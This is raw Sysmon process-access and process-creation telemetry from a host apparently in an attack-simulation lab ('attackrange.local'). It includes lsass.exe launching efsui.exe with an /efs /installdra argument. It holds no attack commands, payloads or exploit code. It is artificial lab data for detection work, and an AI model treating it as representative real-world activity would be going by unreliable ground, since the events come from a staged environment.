12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646A-6064-0B00-00000000AE01}856880C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\efsext.dll+2d2c|C:\Windows\system32\EFSCORE.dll+18451|C:\Windows\system32\EFSCORE.dll+17c2a|C:\Windows\system32\EFSCORE.dll+17805|C:\Windows\system32\EFSCORE.dll+18bd|C:\Windows\system32\efssvc.dll+1337|C:\Windows\System32\sechost.dll+b71a|C:\Windows\System32\sechost.dll+a574|C:\Windows\system32\lsasrv.dll+5361e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.897{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exe10.0.14393.0 (rs1_release.160715-1616)EFS UI ApplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationefsui.exeefsui.exe /efs /installdraC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=6DFA1BBB4D2F89DC46BACABC83B6AB95,SHA256=1106CE6AE6EDFFA752D71F5EFF9FAAB53360CFFC6B224957760FBDC0A7D4FF17,IMPHASH=B865E978ADDB9A939A91896A60E81464{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeC:\Windows\system32\lsass.exe 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 